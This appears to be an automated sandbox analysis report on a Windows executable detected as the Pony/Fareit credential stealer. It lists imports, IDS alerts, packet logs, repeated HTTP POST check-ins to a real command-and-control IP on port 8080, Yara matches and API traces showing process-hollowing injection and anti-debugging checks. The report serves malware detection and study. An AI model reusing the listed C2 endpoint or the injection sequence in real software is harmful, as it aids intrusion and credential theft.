user32.dll	CreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-07T23:12:03.965899+0200	2013934	ET MALWARE Win32.Fareit.A/Pony Downloader Checkin	1	192.168.2.4	50007	67.215.225.205	8080	TCP
2024-10-07T23:12:03.976557+0200	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49730	67.215.225.205	8080	TCP
2024-10-07T23:12:03.976557+0200	2014562	ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98	1	192.168.2.4	49730	67.215.225.205	8080	TCP
2024-10-07T23:12:03.976557+0200	2016550	ET MALWARE Win32/Fareit Checkin 2	1	192.168.2.4	49730	67.215.225.205	8080	TCP
2024-10-07T23:12:25.309473+0200	2013934	ET MALWARE Win32.Fareit.A/Pony Downloader Checkin	1	192.168.2.4	49730	67.215.225.205	8080	TCP
2024-10-07T23:12:30.334014+0200	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49737	67.215.225.205	8080	TCP
2024-10-07T23:12:30.334014+0200	2014562	ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98	1	192.168.2.4	49737	67.215.225.205	8080	TCP
2024-10-07T23:12:30.334014+0200	2016550	ET MALWARE Win32/Fareit Checkin 2	1	192.168.2.4	49737	67.215.225.205	8080	TCP
2024-10-07T23:12:51.671352+0200	2013934	ET MALWARE Win32.Fareit.A/Pony Downloader Checkin	1	192.168.2.4	49737	67.215.225.205	8080	TCP
2024-10-07T23:12:56.692133+0200	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49739	67.215.225.205	8080	TCP
2024-10-07T23:12:56.692133+0200	2014562	ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98	1	192.168.2.4	49739	67.215.225.205	8080	TCP
2024-10-07T23:12:56.692133+0200	2016550	ET MALWARE Win32/Fareit Checkin 2	1	192.168.2.4	49739	67.215.225.205	8080	TCP
2024-10-07T23:13:18.030156+0200	2013934	ET MALWARE Win32.Fareit.A/Pony Downloader Checkin	1	192.168.2.4	49739	67.215.225.205	8080	TCP
2024-10-07T23:13:23.053386+0200	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	49887	67.215.225.205	8080	TCP
2024-10-07T23:13:23.053386+0200	2014562	ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98	1	192.168.2.4	49887	67.215.225.205	8080	TCP
2024-10-07T23:13:23.053386+0200	2016550	ET MALWARE Win32/Fareit Checkin 2	1	192.168.2.4	49887	67.215.225.205	8080	TCP
2024-10-07T23:13:44.389211+0200	2013934	ET MALWARE Win32.Fareit.A/Pony Downloader Checkin	1	192.168.2.4	49887	67.215.225.205	8080	TCP
2024-10-07T23:13:49.411372+0200	2014411	ET MALWARE Fareit/Pony Downloader Checkin 2	1	192.168.2.4	50007	67.215.225.205	8080	TCP
2024-10-07T23:13:49.411372+0200	2014562	ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98	1	192.168.2.4	50007	67.215.225.205	8080	TCP
2024-10-07T23:13:49.411372+0200	2016550	ET MALWARE Win32/Fareit Checkin 2	1	192.168.2.4	50007	67.215.225.205	8080	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 23:12:03.965898991 CEST	49730	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:12:03.971088886 CEST	8080	49730	67.215.225.205	192.168.2.4
Oct 7, 2024 23:12:03.971182108 CEST	49730	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:12:03.971242905 CEST	49730	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:12:03.976479053 CEST	8080	49730	67.215.225.205	192.168.2.4
Oct 7, 2024 23:12:03.976557016 CEST	49730	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:12:03.981733084 CEST	8080	49730	67.215.225.205	192.168.2.4
Oct 7, 2024 23:12:25.309305906 CEST	8080	49730	67.215.225.205	192.168.2.4
Oct 7, 2024 23:12:25.309473038 CEST	49730	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:12:25.309540033 CEST	49730	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:12:25.314367056 CEST	8080	49730	67.215.225.205	192.168.2.4
Oct 7, 2024 23:12:30.322433949 CEST	49737	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:12:30.327749968 CEST	8080	49737	67.215.225.205	192.168.2.4
Oct 7, 2024 23:12:30.327963114 CEST	49737	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:12:30.327963114 CEST	49737	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:12:30.333838940 CEST	8080	49737	67.215.225.205	192.168.2.4
Oct 7, 2024 23:12:30.334013939 CEST	49737	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:12:30.338989019 CEST	8080	49737	67.215.225.205	192.168.2.4
Oct 7, 2024 23:12:51.671137094 CEST	8080	49737	67.215.225.205	192.168.2.4
Oct 7, 2024 23:12:51.671351910 CEST	49737	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:12:51.671930075 CEST	49737	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:12:51.678725004 CEST	8080	49737	67.215.225.205	192.168.2.4
Oct 7, 2024 23:12:56.681910992 CEST	49739	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:12:56.686999083 CEST	8080	49739	67.215.225.205	192.168.2.4
Oct 7, 2024 23:12:56.687208891 CEST	49739	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:12:56.687208891 CEST	49739	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:12:56.692076921 CEST	8080	49739	67.215.225.205	192.168.2.4
Oct 7, 2024 23:12:56.692132950 CEST	49739	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:12:56.696913004 CEST	8080	49739	67.215.225.205	192.168.2.4
Oct 7, 2024 23:13:18.029916048 CEST	8080	49739	67.215.225.205	192.168.2.4
Oct 7, 2024 23:13:18.030155897 CEST	49739	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:13:18.030181885 CEST	49739	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:13:18.035290956 CEST	8080	49739	67.215.225.205	192.168.2.4
Oct 7, 2024 23:13:23.041193962 CEST	49887	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:13:23.046896935 CEST	8080	49887	67.215.225.205	192.168.2.4
Oct 7, 2024 23:13:23.047111988 CEST	49887	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:13:23.047111988 CEST	49887	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:13:23.053319931 CEST	8080	49887	67.215.225.205	192.168.2.4
Oct 7, 2024 23:13:23.053385973 CEST	49887	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:13:23.058634043 CEST	8080	49887	67.215.225.205	192.168.2.4
Oct 7, 2024 23:13:44.388966084 CEST	8080	49887	67.215.225.205	192.168.2.4
Oct 7, 2024 23:13:44.389210939 CEST	49887	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:13:44.389210939 CEST	49887	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:13:44.394186020 CEST	8080	49887	67.215.225.205	192.168.2.4
Oct 7, 2024 23:13:49.400727034 CEST	50007	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:13:49.405889034 CEST	8080	50007	67.215.225.205	192.168.2.4
Oct 7, 2024 23:13:49.406102896 CEST	50007	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:13:49.406102896 CEST	50007	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:13:49.411199093 CEST	8080	50007	67.215.225.205	192.168.2.4
Oct 7, 2024 23:13:49.411371946 CEST	50007	8080	192.168.2.4	67.215.225.205
Oct 7, 2024 23:13:49.416316032 CEST	8080	50007	67.215.225.205	192.168.2.4

HTTP Request Dependency Graph

67.215.225.205

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	67.215.225.205	8080	6608	C:\Users\user\Desktop\a5gvJhukP7.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 23:12:03.971242905 CEST	273	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: 67.215.225.205 Accept: / Accept-Encoding: identity, *;q=0 Content-Length: 177 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	67.215.225.205	8080	6608	C:\Users\user\Desktop\a5gvJhukP7.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 23:12:30.327963114 CEST	273	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: 67.215.225.205 Accept: / Accept-Encoding: identity, *;q=0 Content-Length: 177 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	67.215.225.205	8080	6608	C:\Users\user\Desktop\a5gvJhukP7.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 23:12:56.687208891 CEST	273	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: 67.215.225.205 Accept: / Accept-Encoding: identity, *;q=0 Content-Length: 177 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49887	67.215.225.205	8080	6608	C:\Users\user\Desktop\a5gvJhukP7.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 23:13:23.047111988 CEST	273	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: 67.215.225.205 Accept: / Accept-Encoding: identity, *;q=0 Content-Length: 177 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	50007	67.215.225.205	8080	6608	C:\Users\user\Desktop\a5gvJhukP7.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 23:13:49.406102896 CEST	273	OUT	POST /forum/viewtopic.php HTTP/1.0 Host: 67.215.225.205 Accept: / Accept-Encoding: identity, *;q=0 Content-Length: 177 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Target ID:	0
Start time:	17:11:58
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\a5gvJhukP7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\a5gvJhukP7.exe"
Imagebase:	0xba0000
File size:	135'168 bytes
MD5 hash:	18579D8151A242CF2E9B69B016479481
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, Author: unknown Rule: pony, Description: Identify Pony, Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, Author: unknown Rule: pony, Description: Identify Pony, Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, Author: Brian Wallace @botnet_hunter
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	17:12:02
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\a5gvJhukP7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\a5gvJhukP7.exe"
Imagebase:	0xba0000
File size:	135'168 bytes
MD5 hash:	18579D8151A242CF2E9B69B016479481
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: pony, Description: Identify Pony, Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	14.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.7%
Total number of Nodes:	1105
Total number of Limit Nodes:	20

Executed Functions

Function 00BA1300 Relevance: 49.9, APIs: 33, Instructions: 379
libraryloaderinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE ref: 00BA154B
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA15AF
GetProcAddress.KERNELBASE(00000000), ref: 00BA15B6
_memset.LIBCMT ref: 00BA15C7
CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000001), ref: 00BA15F4
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1622
GetProcAddress.KERNELBASE(00000000), ref: 00BA1629
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00BA163A
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1672
GetProcAddress.KERNELBASE(00000000), ref: 00BA1679
Wow64GetThreadContext.KERNEL32(00000004,00000000), ref: 00BA1685
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA16B3
GetProcAddress.KERNELBASE(00000000), ref: 00BA16BA
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 00BA16D8
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1731
GetProcAddress.KERNELBASE(00000000), ref: 00BA1738
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1772
GetProcAddress.KERNELBASE(00000000), ref: 00BA1779
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00BA1793
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA17D2
GetProcAddress.KERNELBASE(00000000), ref: 00BA17D9
WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000), ref: 00BA17F2
WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000,?,?,00000000), ref: 00BA183A
WriteProcessMemory.KERNELBASE(00000000,?,-00000034,00000004,00000000,?,?,00000000), ref: 00BA186F
LoadLibraryExA.KERNELBASE(D5C9DED0,00000000,00000000), ref: 00BA191F
GetProcAddress.KERNELBASE(00000000), ref: 00BA1926
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00BA1934

Memory Dump Source

Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$Process$Memory$VirtualWrite$Alloc$ContextCreateFreeReadSleepThreadWow64_memset
String ID:
API String ID: 2577535249-0
Opcode ID: a8ea3fffbd8f418fa5563d626ffa3f5dfd94b2399b8c9e327fae9d3a53a859e0
Instruction ID: 4e9a6018346844a14b8d0a9099cbd52ff623d9589c88e49d0e08fd4f682323ea
Opcode Fuzzy Hash: a8ea3fffbd8f418fa5563d626ffa3f5dfd94b2399b8c9e327fae9d3a53a859e0
Instruction Fuzzy Hash: EBF13CB11083819FD370DB68C849B9BBBE8BB89310F508E5CE2D98B291DB749445CB67

Function 00BA1950 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 198
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1AB9
GetProcAddress.KERNELBASE(00000000), ref: 00BA1AC0
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1AE9
GetProcAddress.KERNELBASE(00000000), ref: 00BA1AF0
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1B19
GetProcAddress.KERNELBASE(00000000), ref: 00BA1B20
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1B49
GetProcAddress.KERNELBASE(00000000), ref: 00BA1B50
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1B79
GetProcAddress.KERNELBASE(00000000), ref: 00BA1B80
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1BA9
GetProcAddress.KERNELBASE(00000000), ref: 00BA1BB0
GetModuleHandleA.KERNEL32(00000000), ref: 00BA1BBD
FindResourceA.KERNEL32(00000000,0000004E,00000005), ref: 00BA1BCA
LoadResource.KERNEL32(00000000,00000000), ref: 00BA1BD4
LockResource.KERNEL32(00000000), ref: 00BA1BDB
SizeofResource.KERNEL32(00000000,00000000), ref: 00BA1BE5
SizeofResource.KERNEL32(00000000,00000000), ref: 00BA1BEE
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1C1F
GetProcAddress.KERNELBASE(00000000), ref: 00BA1C26
ExitProcess.KERNEL32 ref: 00BA1C65

Strings

123, xrefs: 00BA1C48

Memory Dump Source

Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Load$AddressLibraryProc$Resource$Sizeof$ExitFindHandleLockModuleProcess
String ID: 123
API String ID: 2491338506-2286445522
Opcode ID: dd98f24847f98b249f68a0c795ad83ba045eb5a9c482b99a45026a71b9d38763
Instruction ID: aa6c5128856587f465c750fc678057946fec1bdbf99077228d82e2524a0332e2
Opcode Fuzzy Hash: dd98f24847f98b249f68a0c795ad83ba045eb5a9c482b99a45026a71b9d38763
Instruction Fuzzy Hash: 1E8119B10183809FD351DF64D859B5BBBE8FB9A304F504E4DF2968B2A1EB749405CB63

Function 00BA1E10 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 169
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1FF9
GetProcAddress.KERNELBASE(00000000), ref: 00BA2000
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA2019
GetProcAddress.KERNELBASE(00000000), ref: 00BA2020
LoadLibraryExA.KERNELBASE(000000BB,00000000,00000000), ref: 00BA2039
GetProcAddress.KERNELBASE(00000000), ref: 00BA2040
LoadLibraryExA.KERNELBASE(000000BB,00000000,00000000), ref: 00BA205C
GetProcAddress.KERNELBASE(00000000), ref: 00BA2063
LoadLibraryExA.KERNELBASE(000000BB,00000000,00000000), ref: 00BA207C
GetProcAddress.KERNELBASE(00000000), ref: 00BA2083
RtlCreateQueryDebugBuffer.NTDLL(00000000,00000000), ref: 00BA2092
GetCurrentProcessId.KERNEL32(00000014,00000000), ref: 00BA209D
RtlQueryProcessDebugInformation.NTDLL(00000000), ref: 00BA20A4
OutputDebugStringA.KERNEL32(00BA8814), ref: 00BA20BB
Sleep.KERNEL32(00000064), ref: 00BA20C2

Strings

l.dl, xrefs: 00BA1F8E
ntdl, xrefs: 00BA1F86

Memory Dump Source

Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$Debug$ProcessQuery$BufferCreateCurrentInformationOutputSleepString
String ID: l.dl$ntdl
API String ID: 804534587-1236859653
Opcode ID: d27e271798b69598962eb67fad9d6082e486116602ca8cc92f1954e23183a61d
Instruction ID: 7b13d3cb3f6d0e314ec768bd614721f8693a168e6e304e81beac12712f551e57
Opcode Fuzzy Hash: d27e271798b69598962eb67fad9d6082e486116602ca8cc92f1954e23183a61d
Instruction Fuzzy Hash: 307137B11083809FD760DF64985AB5BBBE4FB8A714F508D0DF2D68A2A1DB358905CB63

Function 00BA2110 Relevance: 10.6, APIs: 7, Instructions: 147
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BA1C70: GetVersionExA.KERNEL32 ref: 00BA1C94

MessageBoxIndirectA.USER32(00000000), ref: 00BA212A
MessageBoxExA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00BA213A
EndDialog.USER32(00000000,00000000), ref: 00BA2144
SendDlgItemMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00BA2154
ExitProcess.KERNEL32 ref: 00BA215C

Memory Dump Source

Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Message$DialogExitIndirectItemProcessSendVersion
String ID:
API String ID: 3504329115-0
Opcode ID: e5bd88c072c10ba258250c50b690bd9ae3581ff3becc3d4ab6d460b37c0c2afa
Instruction ID: e237a94bdd837a8066ac5d801f9d199556e68e124c672510adbb66228d11aa58
Opcode Fuzzy Hash: e5bd88c072c10ba258250c50b690bd9ae3581ff3becc3d4ab6d460b37c0c2afa
Instruction Fuzzy Hash: D2213C337AC2026BEB5CEF749D27B7F26D79B06611F42C87EA207CA0D1ED709404465A

Function 00BA17A7 Relevance: 21.1, APIs: 14, Instructions: 133
libraryloaderinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA17D2
GetProcAddress.KERNELBASE(00000000), ref: 00BA17D9
WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000), ref: 00BA17F2
WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000,?,?,00000000), ref: 00BA183A
WriteProcessMemory.KERNELBASE(00000000,?,-00000034,00000004,00000000,?,?,00000000), ref: 00BA186F
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA18A4
GetProcAddress.KERNELBASE(00000000), ref: 00BA18AB
Wow64SetThreadContext.KERNEL32(00000004,?,?,?,00000000), ref: 00BA18B7
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA18E2
GetProcAddress.KERNELBASE(00000000), ref: 00BA18E9
ResumeThread.KERNELBASE(00000004,?,?,00000000), ref: 00BA18F4

Memory Dump Source

Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadMemoryProcProcessWrite$Thread$ContextResumeWow64
String ID:
API String ID: 3183956845-0
Opcode ID: d69a18e68a37864fbaa6a7f216b17903493c36381d196e3c5f0ecaaa62adea17
Instruction ID: b69003dfd34aeb9165c552410dc2f0dd134b9cae6109dceaf9407b51c875795a
Opcode Fuzzy Hash: d69a18e68a37864fbaa6a7f216b17903493c36381d196e3c5f0ecaaa62adea17
Instruction Fuzzy Hash: 69417F71108301AFD364DB64CC89FABB3E9EB89710F508D5CF29AC7191DB34A845C762

Function 00BA1806 Relevance: 16.6, APIs: 11, Instructions: 103
